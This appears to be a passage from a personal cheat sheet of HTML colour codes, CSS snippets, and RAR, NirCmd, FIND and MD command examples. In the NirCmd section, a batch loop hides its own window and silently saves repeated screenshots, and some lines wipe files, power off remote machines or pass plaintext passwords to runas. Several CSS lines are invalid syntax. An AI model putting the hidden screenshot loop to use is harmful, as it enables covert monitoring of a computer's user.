  1235. [HTML] Khaki(#F0E68C);Lavender(#E6E6FA);LavenderBlush(#FFF0F5);LawnGreen(#7CFC00);
  1236. [HTML] LemonChiffon(#FFFACD);LightBlue(#ADD8E6);LightCoral(#F08080);LightCyan(#E0FFFF);
  1237. [HTML] LightGoldenRodYellow(#FAFAD2);LightGray(#D3D3D3);LightGreen(#90EE90);LightPink(#FFB6C1);
  1238. [HTML] LightSalmon(#FFA07A);LightSeaGreen(#20B2AA);LightSkyBlue(#87CEFA);LightSlateGray(#778899);
  1239. [HTML] LightSteelBlue(#B0C4DE);LightYellow(#FFFFE0);Lime(#00FF00);LimeGreen(#32CD32);
  1240. [HTML] Linen(#FAF0E6);Magenta(#FF00FF);Maroon(#800000);MediumAquaMarine(#66CDAA);
  1241. [HTML] MediumBlue(#0000CD);MediumOrchid(#BA55D3);MediumPurple(#9370DB);MediumSeaGreen(#3CB371);
  1242. [HTML] MediumSlateBlue(#7B68EE);MediumSpringGreen(#00FA9A);MediumTurquoise(#48D1CC);
  1243. [HTML] MediumVioletRed(#C71585);MidnightBlue(#191970);MintCream(#F5FFFA);MistyRose(#FFE4E1);
  1244. [HTML] Moccasin(#FFE4B5);NavajoWhite(#FFDEAD);Navy(#000080);OldLace(#FDF5E6);Olive(#808000);
  1245. [HTML] OliveDrab(#6B8E23);Orange(#FFA500);OrangeRed(#FF4500);Orchid(#DA70D6);PaleGoldenRod(#EEE8AA);
  1246. [HTML] PaleGreen(#98FB98);PaleTurquoise(#AFEEEE);PaleVioletRed(#DB7093);PapayaWhip(#FFEFD5);
  1247. [HTML] PeachPuff(#FFDAB9);Peru(#CD853F);Pink(#FFC0CB);Plum(#DDA0DD);PowderBlue(#B0E0E6);
  1248. [HTML] Purple(#800080);RebeccaPurple(#663399);Red(#FF0000);RosyBrown(#BC8F8F);RoyalBlue(#4169E1);
  1249. [HTML] SaddleBrown(#8B4513);Salmon(#FA8072);SandyBrown(#F4A460);SeaGreen(#2E8B57);SeaShell(#FFF5EE);
  1250. [HTML] Sienna(#A0522D);Silver(#C0C0C0);SkyBlue(#87CEEB);SlateBlue(#6A5ACD);SlateGray(#708090);
  1251. [HTML] SlateGrey(#708090);Snow(#FFFAFA);SpringGreen(#00FF7F);SteelBlue(#4682B4);Tan(#D2B48C);
  1252. [HTML] Teal(#008080);Thistle(#D8BFD8);Tomato(#FF6347);Turquoise(#40E0D0);Violet(#EE82EE);
  1253. [HTML] Wheat(#F5DEB3);White(#FFFFFF);WhiteSmoke(#F5F5F5);Yellow(#FFFF00);YellowGreen(#9ACD32);
  1254. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1255. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1256. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1257. [CSS] <link rel="stylesheet" href="https://www.w3schools.com/html/styles.css">
  1258. [CSS] <link rel="stylesheet" href="styles.css">
  1259. [CSS] /* This is a single-line comment */
  1260. [CSS] /* This is
  1261. [CSS] a multi-line
  1262. [CSS] comment */
  1263. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Audiowide">
  1264. [CSS] <style>
  1265. [CSS] body {font-family: "Audiowide", sans-serif;}
  1266. [CSS] h1.a {font-family: "Audiowide", sans-serif;}
  1267. [CSS] h1.b {font-family: "Sofia", sans-serif;}
  1268. [CSS] h1.c {font-family: "Trirong", serif;}
  1269. [CSS] body {
  1270. [CSS] font-family: "Sofia", sans-serif;
  1271. [CSS] font-size: 30px;
  1272. [CSS] text-shadow: 3px 3px 3px #ababab;
  1273. [CSS] }
  1274. [CSS] </style>
  1275. [CSS] <style>
  1276. [CSS] body {
  1277. [CSS] font-family: "Sofia", sans-serif;
  1278. [CSS] font-size: 30px;
  1279. [CSS] }
  1280. [CSS] </style>
  1281. [CSS] </head>
  1282. [CSS] <body>
  1283. [CSS] <h1 class="font-effect-fire">Sofia on Fire</h1>
  1284. [CSS] </body>
  1285. [CSS] <head>
  1286. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Sofia&effect=neon|outline|emboss|shadow-multiple">
  1287. [CSS] <style>
  1288. [CSS] body {
  1289. [CSS] font-family: "Sofia", sans-serif;
  1290. [CSS] font-size: 30px;
  1291. [CSS] }
  1292. [CSS] </style>
  1293. [CSS] </head>
  1294. [CSS] <body>
  1295. [CSS] <h1 class="font-effect-neon">Neon Effect</h1>
  1296. [CSS] <h1 class="font-effect-outline">Outline Effect</h1>
  1297. [CSS] <h1 class="font-effect-emboss">Emboss Effect</h1>
  1298. [CSS] <h1 class="font-effect-shadow-multiple">Multiple Shadow Effect</h1>
  1299. [CSS] </body>
  1300. [CSS] -------------------------------------------------------------
  1301. [CSS] 1 Use the HTML style attribute for inline styling
  1302. [CSS] <h1 style="color:blue;text-align:center;">Text</h1>
  1303. [CSS] <p style="color:red;">This is a paragraph.</p>
  1304. [CSS] 2 Use the HTML <style> element to define internal CSS
  1305. [CSS] 3 Use the HTML <link> element to refer to an external CSS file
  1306. [CSS] 4 Use the HTML <head> element to store <style> and <link> elements
  1307. [CSS] 5 Use the CSS color property for text colors
  1308. [CSS] 6 Use the CSS font-family property for text fonts
  1309. [CSS] 7 Use the CSS font-size property for text sizes
  1310. [CSS] 8 Use the CSS border property for borders
  1311. [CSS] 9 Use the CSS padding property for space inside the border
  1312. [CSS] 10 Use the CSS margin property for space outside the border
  1313. [CSS] ----------------------------------------------------------------
  1314. [CSS] "styles.css":
  1315. [CSS] body {
  1316. [CSS] background-color: powderblue;
  1317. [CSS] background-image: url("paper.gif");
  1318. [CSS] background-image: url("bgdesert.jpg");
  1319. [CSS] background-repeat: repeat-x; repeat-y; no-repeat;
  1320. [CSS] background-position: right top;
  1321. [CSS] background-attachment: fixed; scroll;
  1322. [CSS] }
  1323. [CSS] body {
  1324. [CSS] background: #ffffff url("img_tree.png") no-repeat right top;
  1325. [CSS] }
  1326. [CSS] h1 {
  1327. [CSS] background-color: green;
  1328. [CSS] opacity: 0.3; 1; 0.6;
  1329. [CSS] background-image: url("bgdesert.jpg");
  1330. [CSS] color: blue; /* Set text color to blue */
  1331. [CSS] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  1332. [CSS] font-style: normal; italic; oblique;
  1333. [CSS] font: italic small-caps bold 12px/30px Georgia, serif;
  1334. [CSS] font-weight: normal; bold;
  1335. [CSS] font-variant: normal; small-caps;
  1336. [CSS] font-size: 300%; 40px; 14px; 10vw; OR font-size: 2.5em; /* 40px/16=2.5em */
  1337. [CSS] margin-left: 20px;
  1338. [CSS] text-align: center; left; right; justify;
  1339. [CSS] text-decoration: none; overline; line-through; underline;
  1340. [CSS] text-transform: uppercase; lowercase; capitalize;
  1341. [CSS] text-indent: 50px;
  1342. [CSS] letter-spacing: 5px; -2px;
  1343. [CSS] line-height: 0.8; 1.8;
  1344. [CSS] word-spacing: 10px;-2px;
  1345. [CSS] white-space: nowrap;
  1346. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  1347. [CSS] }
  1348. [CSS] p {
  1349. [CSS] background-color: yellow;
  1350. [CSS] opacity: 0.3; 1; 0.6;
  1351. [CSS] background-image: url("bgdesert.jpg");
  1352. [CSS] color: red; white;
  1353. [CSS] font-family: courier; verdana;
  1354. [CSS] font-size: 160%; 20px;
  1355. [CSS] border: 2px solid powderblue;
  1356. [CSS] padding: 30px; OR margin: 50px;
  1357. [CSS] text-align: center; left; right; justify;
  1358. [CSS] text-decoration: none; overline; line-through; underline;
  1359. [CSS] text-transform: uppercase; lowercase; capitalize;
  1360. [CSS] text-indent: 50px;
  1361. [CSS] letter-spacing: 5px; -2px;
  1362. [CSS] line-height: 0.8; 1.8;
  1363. [CSS] word-spacing: 10px;-2px;
  1364. [CSS] white-space: nowrap;
  1365. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  1366. [CSS] }
  1367. [CSS] The CSS rule below will be applied to the HTML element with id="para1":
  1368. [CSS] #para1 {
  1369. [CSS] text-align: center;
  1370. [CSS] color: red;
  1371. [CSS] }
  1372. [CSS] In this example all HTML elements with class="center" will be red and center-aligned:
  1373. [CSS] .center {
  1374. [CSS] text-align: center;
  1375. [CSS] color: red;
  1376. [CSS] }
  1377. [CSS] div {
  1378. [CSS] background-color: green;
  1379. [CSS] opacity: 0.3; 1; 0.6;
  1380. [CSS] }
  1381. [CSS] In this example only <p> elements with class="center" will be red and center-aligned:
  1382. [CSS] p.center {
  1383. [CSS] text-align: center;
  1384. [CSS] color: red;
  1385. [CSS] } ; <p class="center large">This paragraph refers to two classes.</p>
  1386. [CSS] * {
  1387. [CSS] text-align: center;
  1388. [CSS] color: blue;
  1389. [CSS] }
  1390. [CSS] h1, h2, p {
  1391. [CSS] text-align: center;
  1392. [CSS] color: red;
  1393. [CSS] }
  1394. [CSS] p.dotted {border-style: dotted;}
  1395. [CSS] p.dashed {border-style: dashed;}
  1396. [CSS] p.solid {border-style: solid;}
  1397. [CSS] p.double {border-style: double;}
  1398. [CSS] p.groove {border-style: groove;}
  1399. [CSS] p.ridge {border-style: ridge;}
  1400. [CSS] p.inset {border-style: inset;}
  1401. [CSS] p.outset {border-style: outset;}
  1402. [CSS] p.none {border-style: none;}
  1403. [CSS] p.hidden {border-style: hidden;}
  1404. [CSS] p.mix {border-style: dotted dashed solid double;}
  1405. [CSS] p.one {
  1406. [CSS] border-radius: 5px;
  1407. [CSS] border-color: red;
  1408. [CSS] border-style: solid;
  1409. [CSS] border-width: 5px;
  1410. [CSS] border-width: 5px 20px; /* 5px top and bottom, 20px on the sides */
  1411. [CSS] }
  1412. [CSS] p.two {
  1413. [CSS] border-radius: 5px;
  1414. [CSS] border-color: red;
  1415. [CSS] border-style: solid;
  1416. [CSS] border-width: medium;
  1417. [CSS] border-width: 20px 5px; /* 20px top and bottom, 5px on the sides */
  1418. [CSS] }
  1419. [CSS] p.three {
  1420. [CSS] border-radius: 5px;
  1421. [CSS] border-color: red;
  1422. [CSS] border-style: dotted;
  1423. [CSS] border-width: 2px;
  1424. [CSS] border-width: 25px 10px 4px 35px; /* 25px top, 10px right, 4px bottom and 35px left */
  1425. [CSS] }
  1426. [CSS] p.four {
  1427. [CSS] border-style: dotted;
  1428. [CSS] border-width: thick;
  1429. [CSS] }
  1430. [CSS] p {
  1431. [CSS] border-top-style: dotted;
  1432. [CSS] border-right-style: solid;
  1433. [CSS] border-bottom-style: dotted;
  1434. [CSS] border-left-style: solid;
  1435. [CSS] }
  1436. [CSS] p {
  1437. [CSS] border: 5px solid red;
  1438. [CSS] }
  1439. [CSS] p {
  1440. [CSS] margin-top: 100px;
  1441. [CSS] margin-bottom: 100px;
  1442. [CSS] margin-right: 150px;
  1443. [CSS] margin-left: 80px;
  1444. [CSS] -----------------------
  1445. [CSS] margin: 0 0 50px 0;
  1446. [CSS] margin: 20px 0 0 0;
  1447. [CSS] }
  1448. [CSS] div {
  1449. [CSS] padding-top: 50px;
  1450. [CSS] padding-right: 30px;
  1451. [CSS] padding-bottom: 50px;
  1452. [CSS] padding-left: 80px;
  1453. [CSS] }
  1454. [CSS] div {
  1455. [CSS] padding: 25px 50px 75px 100px;
  1456. [CSS] }
  1457. [CSS] div {
  1458. [CSS] height: 200px;
  1459. [CSS] width: 50%;
  1460. [CSS] max-width: 500px; min-width: 500px;
  1461. [CSS] max-height: 500px; min-height: 500px;
  1462. [CSS] background-color: powderblue;
  1463. [CSS] }
  1464. [CSS] div {
  1465. [CSS] width: 300px;
  1466. [CSS] border: 15px solid green;
  1467. [CSS] padding: 50px;
  1468. [CSS] margin: 20px;
  1469. [CSS] }
  1470. [CSS] p.dotted {outline-style: dotted;}
  1471. [CSS] p.dashed {outline-style: dashed;}
  1472. [CSS] p.solid {outline-style: solid;}
  1473. [CSS] p.double {outline-style: double;}
  1474. [CSS] p.groove {outline-style: groove;}
  1475. [CSS] p.ridge {outline-style: ridge;}
  1476. [CSS] p.inset {outline-style: inset;}
  1477. [CSS] p.outset {outline-style: outset;}
  1478. [CSS] /* unvisited link */
  1479. [CSS] a:link {
  1480. [CSS] color: red;
  1481. [CSS] }
  1482. [CSS] /* visited link */
  1483. [CSS] a:visited {
  1484. [CSS] color: green;
  1485. [CSS] }
  1486. [CSS] /* mouse over link */
  1487. [CSS] a:hover {
  1488. [CSS] color: hotpink;
  1489. [CSS] }
  1490. [CSS] /* selected link */
  1491. [CSS] a:active {
  1492. [CSS] color: blue;
  1493. [CSS] }
  1494. [CSS] a:link, a:visited {
  1495. [CSS] background-color: #f44336;
  1496. [CSS] color: white;
  1497. [CSS] padding: 14px 25px;
  1498. [CSS] text-align: center;
  1499. [CSS] text-decoration: none;
  1500. [CSS] display: inline-block;
  1501. [CSS] }
  1502. [CSS] a:hover, a:active {
  1503. [CSS] background-color: red;
  1504. [CSS] }
  1505. [CSS] <span style="cursor: auto">auto</span><br>
  1506. [CSS] <span style="cursor: crosshair">crosshair</span><br>
  1507. [CSS] <span style="cursor: default">default</span><br>
  1508. [CSS] <span style="cursor: e-resize">e-resize</span><br>
  1509. [CSS] <span style="cursor: help">help</span><br>
  1510. [CSS] <span style="cursor: move">move</span><br>
  1511. [CSS] <span style="cursor: n-resize">n-resize</span><br>
  1512. [CSS] <span style="cursor: ne-resize">ne-resize</span><br>
  1513. [CSS] <span style="cursor: nw-resize">nw-resize</span><br>
  1514. [CSS] <span style="cursor: pointer">pointer</span><br>
  1515. [CSS] <span style="cursor: progress">progress</span><br>
  1516. [CSS] <span style="cursor: s-resize">s-resize</span><br>
  1517. [CSS] <span style="cursor: se-resize">se-resize</span><br>
  1518. [CSS] <span style="cursor: sw-resize">sw-resize</span><br>
  1519. [CSS] <span style="cursor: text">text</span><br>
  1520. [CSS] <span style="cursor: w-resize">w-resize</span><br>
  1521. [CSS] <span style="cursor: wait">wait</span>
  1522. [CSS] ul {
  1523. [CSS] list-style: square inside url("sqpurple.gif");
  1524. [CSS] }
  1525. [CSS] table, th, td {
  1526. [CSS] border: 1px solid black;
  1527. [CSS] }
  1528. [CSS] table {
  1529. [CSS] border-collapse: collapse;
  1530. [CSS] }
  1531. [CSS] table th, td {
  1532. [CSS] padding: 15px;
  1533. [CSS] text-align: left;
  1534. [CSS] border: 1px solid black;
  1535. [CSS] }
  1536. [CSS] #rcorners1 {
  1537. [CSS] border-radius: 25px;
  1538. [CSS] background: #73AD21;
  1539. [CSS] padding: 20px;
  1540. [CSS] width: 200px;
  1541. [CSS] height: 150px;
  1542. [CSS] }
  1543. [CSS] #rcorners2 {
  1544. [CSS] border-radius: 25px;
  1545. [CSS] border: 2px solid #73AD21;
  1546. [CSS] padding: 20px;
  1547. [CSS] width: 200px;
  1548. [CSS] height: 150px;
  1549. [CSS] }
  1550. [CSS] #rcorners3 {
  1551. [CSS] border-radius: 25px;
  1552. [CSS] background: url(paper.gif);
  1553. [CSS] background-position: left top;
  1554. [CSS] background-repeat: repeat;
  1555. [CSS] padding: 20px;
  1556. [CSS] width: 200px;
  1557. [CSS] height: 150px;
  1558. [CSS] }
  1559. [CSS] #rcorners1 {
  1560. [CSS] border-radius: 15px 50px 30px 5px;
  1561. [CSS] background: #73AD21;
  1562. [CSS] padding: 20px;
  1563. [CSS] width: 200px;
  1564. [CSS] height: 150px;
  1565. [CSS] }
  1566. [CSS] #rcorners2 {
  1567. [CSS] border-radius: 15px 50px 30px;
  1568. [CSS] background: #73AD21;
  1569. [CSS] padding: 20px;
  1570. [CSS] width: 200px;
  1571. [CSS] height: 150px;
  1572. [CSS] }
  1573. [CSS] #rcorners3 {
  1574. [CSS] border-radius: 15px 50px;
  1575. [CSS] background: #73AD21;
  1576. [CSS] padding: 20px;
  1577. [CSS] width: 200px;
  1578. [CSS] height: 150px;
  1579. [CSS] }
  1580. [CSS] #rcorners4 {
  1581. [CSS] border-radius: 15px;
  1582. [CSS] background: #73AD21;
  1583. [CSS] padding: 20px;
  1584. [CSS] width: 200px;
  1585. [CSS] height: 150px;
  1586. [CSS] }
  1587. [CSS] #borderimg {
  1588. [CSS] border: 10px solid transparent;
  1589. [CSS] padding: 15px;
  1590. [CSS] border-image: url(border.png) 30 round;
  1591. [CSS] }
  1592. [CSS] #borderimg {
  1593. [CSS] border: 10px solid transparent;
  1594. [CSS] padding: 15px;
  1595. [CSS] border-image: url(border.png) 30 stretch;
  1596. [CSS] }
  1597. [CSS] #example1 {
  1598. [CSS] background-image: url(img_flwr.gif), url(paper.gif);
  1599. [CSS] background-position: right bottom, left top;
  1600. [CSS] background-repeat: no-repeat, repeat;
  1601. [CSS] }
  1602. [CSS] #div1 {
  1603. [CSS] background: url(img_flower.jpg);
  1604. [CSS] background-size: 100px 80px;
  1605. [CSS] background-repeat: no-repeat;
  1606. [CSS] }
  1607. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1608. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-RAR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1609. [RAR] Usage: RAR <command> -<switch 1> -<switch N> <archive> <files...>
  1610. [RAR] <@listfiles...> <path_to_extract\>
  1611. [RAR] %WinDir%\RAr.exe a NSK.rar "D:\latest data"
  1612. [RAR] %WinDir%\RAr.exe a help *.hlp (add all *.hlp files from the current folder to the archive help.rar)
  1613. [RAR] [RAR]%WinDir%\RAr.exe a -r -v362 -s -sfx -rr save
  1614. [RAR] %WinDir%\RAr.exe a -pZaBaToAd -r secret games\*.*
  1615. [RAR]%WinDir%\RAr.exe a NSK.rar d:\files -p123 -p- -k
  1616. [RAR] ----------------------------------------------------------------------
  1617. [RAR] Usage: RAR & UNRAR <command> -<switch 1> -<switch N> <archive> <files...>
  1618. [RAR] <@listfiles...> <path_to_extract\>
  1619. [RAR] %WinDir%\UnRAR.exe x NSK.rar D:\data\
  1620.  
  1621. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-RAR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1622. [NIRCMD] :-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1623. [NIRCMD] @ECHO OFF
  1624. [NIRCMD] COLOR 1B
  1625. [NIRCMD] REM setlocal enabledelayedexpansion
  1626. [NIRCMD] set /p "sec=Screen Capture Time PerSec:
  1627. [NIRCMD] (
  1628. [NIRCMD] nircmd.exe win hide ititle "cmd.exe"
  1629. [NIRCMD] :top
  1630. [NIRCMD] timeout /t %sec%
  1631. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen.jpg"
  1632. [NIRCMD] goto top
  1633. [NIRCMD] )
  1634. [NIRCMD] -------------------------------------------------------------------
  1635. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen%%random%%.jpg"
  1636. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  1637. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  1638. [NIRCMD] nircmd.exe filldelete "c:\temp\*.*"
  1639. [NIRCMD] nircmd.exe filldelete "c:\temp\myfile.dat"
  1640. [NIRCMD] nircmd.exe speak text ~$clipboard$
  1641. [NIRCMD] nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  1642. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt"
  1643. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  1644. [NIRCMD] nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  1645. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$loopcount$.png
  1646. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png"
  1647. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png" 50 50 300 200
  1648. [NIRCMD] nircmd.exe savescreenshot *clipboard* 150 150 400 400
  1649. [NIRCMD] nircmd.exe savescreenshotwin "c:\temp\win.png"
  1650. [NIRCMD] nircmd.exe savescreenshotwin *clipboard*
  1651. [NIRCMD] nircmd.exe cmdwait 1000 monitor off
  1652. [NIRCMD] nircmd.exe infobox "This is a message box !" "message"
  1653. [NIRCMD] nircmd.exe folder.appdata
  1654. [NIRCMD] nircmd.exe folder.startup
  1655. [NIRCMD] nircmd.exe beep 500 2000
  1656. [NIRCMD] nircmd.exe wait 1000
  1657. [NIRCMD] nircmd.exe wait 500
  1658. [NIRCMD] nircmd.exe sendkeypress ctrl+shift+esc
  1659. [NIRCMD] nircmd.exe sendkeypress Ctrl+printscreen
  1660. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  1661. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  1662. [NIRCMD] nircmd.exe convertimages "c:\temp\a*.gif" .png
  1663. [NIRCMD] nircmd.exe convertimages "c:\temp\*.jpg" .gif
  1664. [NIRCMD] nircmd.exe emptybin
  1665. [NIRCMD] nircmd.exe speak text ~$clipboard$
  1666. [NIRCMD] nircmd.exe speak file "D:\speak.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  1667. [NIRCMD] nircmd.exe cdrom open j:
  1668. [NIRCMD] nircmd.exe cdrom close y:
  1669. [NIRCMD] nircmd.exe mutesysvolume 1
  1670. [NIRCMD] nircmd.exe mutesysvolume 0
  1671. [NIRCMD] nircmd.exe mutesysvolume 2
  1672. [NIRCMD] nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  1673. [NIRCMD] nircmd.exe changesysvolume 2000
  1674. [NIRCMD] nircmd.exe changesysvolume -5000
  1675. [NIRCMD] nircmd.exe setsysvolume 65535
  1676. [NIRCMD] nircmd.exe monitor off
  1677. [NIRCMD] nircmd.exe screensaver
  1678. [NIRCMD] nircmd.exe exitwin poweroff
  1679. [NIRCMD] nircmd.exe multiremote copy "c:\temp\computers.txt" exitwin poweroff force
  1680. [NIRCMD] nircmd.exe rasdial "My Internet"
  1681. [NIRCMD] nircmd.exe rashangup "My Internet"
  1682. [NIRCMD] nircmd.exe win trans ititle "internet explorer" 192
  1683. [NIRCMD] nircmd.exe win min class "IEFrame"
  1684. [NIRCMD] nircmd.exe win close class "IEFrame"
  1685. [NIRCMD] nircmd.exe win close class "CabinetWClass"
  1686. [NIRCMD] nircmd.exe win hide class "IEFrame"
  1687. [NIRCMD] nircmd.exe win show class "IEFrame"
  1688. [NIRCMD] nircmd.exe win center alltop
  1689. [NIRCMD] nircmd.exe win -style title "my computer" 0x00C00000
  1690. [NIRCMD] nircmd.exe win +style title "my computer" 0x00C00000
  1691. [NIRCMD] nircmd win +exstyle title "my computer" 0x00400000
  1692. [NIRCMD] nircmd win child title "my computer" +exstyle all 0x00400000
  1693. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Close All IE" win close class "IEFrame"
  1694. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Hide All IE" win hide class "IEFrame"
  1695. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Show All IE" win show class "IEFrame"
  1696. [NIRCMD] nircmd.exe win settopmost title "Calculator" 1
  1697. [NIRCMD] nircmd.exe win settopmost title "Calculator" 0
  1698. [NIRCMD] nircmd.exe shortcut "f:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  1699. [NIRCMD] nircmd.exe win hide class progman
  1700. [NIRCMD] nircmd.exe win show class progman
  1701. [NIRCMD] nircmd.exe killprocess iexplore.exe
  1702. [NIRCMD] nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.desktop$" "NirSoft"
  1703. [NIRCMD] nircmd.exe setdisplay 800 600 24
  1704. [NIRCMD] nircmd.exe execmd copy "~$folder.desktop$\*.lnk" f:\temp\desktop
  1705. [NIRCMD] nircmd regedit "~$clipboard$"
  1706. [NIRCMD] nircmd.exe clipboard set ~$folder.desktop$
  1707. [NIRCMD] nircmd.exe clipboard set ~$folder.start_menu$
  1708. [NIRCMD] nircmd.exe clipboard readfile "c:\My Files\info1.txt"
  1709. [NIRCMD] nircmd.exe clipboard addfile "c:\My Files\info1.txt"
  1710. [NIRCMD] nircmd.exe clipboard clear
  1711. [NIRCMD] nircmd.exe paramsfile "c:\temp\folders.txt" "" "" execmd md ~$fparam.1$
  1712. [NIRCMD] nircmd.exe dlg "" "" click yes
  1713. [NIRCMD] nircmd.exe cmdwait 2000 savescreenshot "f:\temp\shot.png"
  1714. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM_dd_yyyy$-~$currtime.HH_mm_ss$.png
  1715. [NIRCMD] nircmd.exe elevate notepad.exe
  1716. [NIRCMD] nircmd.exe elevate notepad.exe C:\Windows\System32\Drivers\etc\HOSTS
  1717. [NIRCMD] nircmd.exe elevate "c:\program files\my software\abc.exe"
  1718. [NIRCMD] nircmd.exe runas admin1 Password1 "F:\Program Files\Mozilla Firefox\firefox.exe"
  1719. [NIRCMD] nircmd.exe runas Domain01\user01 myp234Jk c:\temp\myprogram.exe
  1720. [NIRCMD] nircmd.exe runas [email protected] Nm1923a "c:\temp\myprogram.exe" -a -k
  1721. [NIRCMD] nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  1722. [NIRCMD] nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  1723. [NIRCMD] nircmd.exe trayballoon "Hello" "This is a test..." "shell32.dll,22" 15000
  1724. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon " "shell32.dll,-154" 10000
  1725. [NIRCMD] nircmd.exe runinteractivecmd savescreenshot "c:\temp\screenshot1.png"
  1726. [NIRCMD] nircmd.exe runinteractive c:\windows\system32\taskmgr.exe
  1727. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon \temp\icon1.ico" 10000
  1728. [NIRCMD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1729. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1730. [FIND] [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[ ...]]
  1731. [FIND] /V Displays all lines NOT containing the specified string.
  1732. [FIND] /C Displays only the count of lines containing the string.
  1733. [FIND] /N Displays line numbers with the displayed lines.
  1734. [FIND] /I Ignores the case of characters when searching for the string.
  1735. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1736. [FIND] "string" Specifies the text string to find.
  1737. [FIND] [drive:][path]filename Specifies a file or files to search.
  1738. [FIND] EXMPLES:- FIND "WORD" *.txt
  1739. [FIND] FIND /V /C "" D:\Samle.txt OR *.txt
  1740. [FIND] FIND /I "WORD" *Files*.txt
  1741. [FIND] FIND /N /I "TEXT" *.txt
  1742. [FIND] TYPE D:\Sample.txt | FIND " /V /C
  1743. [FIND] ----------------------------------------------------
  1744. [FIND] FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file]
  1745. [FIND] [/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]]
  1746. [FIND] strings [[drive:][path]filename[ ...]]
  1747. [FIND] /B Matches pattern if at the beginning of a line.
  1748. [FIND] /E Matches pattern if at the end of a line.
  1749. [FIND] /L Uses search strings literally.
  1750. [FIND] /R Uses search strings as regular expressions.
  1751. [FIND] /S Searches for matching files in the current directory and all
  1752. [FIND] subdirectories.
  1753. [FIND] /I Specifies that the search is not to be case-sensitive.
  1754. [FIND] /X Prints lines that match exactly.
  1755. [FIND] /V Prints only lines that do not contain a match.
  1756. [FIND] /N Prints the line number before each line that matches.
  1757. [FIND] /M Prints only the filename if a file contains a match.
  1758. [FIND] /O Prints character offset before each matching line.
  1759. [FIND] /P Skip files with non-printable characters.
  1760. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1761. [FIND] /A:attr Specifies color attribute with two hex digits. See "color / "
  1762. [FIND] /F:file Reads file list from the specified file(/ stands for console).
  1763. [FIND] /C:string Uses specified string as a literal search string.
  1764. [FIND] /G:file Gets search strings from the specified file(/ stands for console).
  1765. [FIND] /D:dir Search a semicolon delimited list of directories
  1766. [FIND] strings Text to be searched for.
  1767. [FIND] [drive:][path]filename Specifies a file or files to search.
  1768. [FIND] EXMPLES:-
  1769. [FIND] FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  1770. [FIND] FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  1771. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1772. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1773. [MD] MKDIR [drive:]path
  1774. [MD] MD [drive:]path
  1775. [MD] MD test ; md C:\test ; md C:\test ; mkdir \a\b\c
  1776. [MD] MD user1 user2 user3 ; md "my example directory"
  1777. [MD] MD ..\example
  1778. [MD] echo "Hello">C:\new.txt
  1779. [MD] echo. 2>EmptyFile.txt
  1780. [MD] type 2>EmptyFile.txt
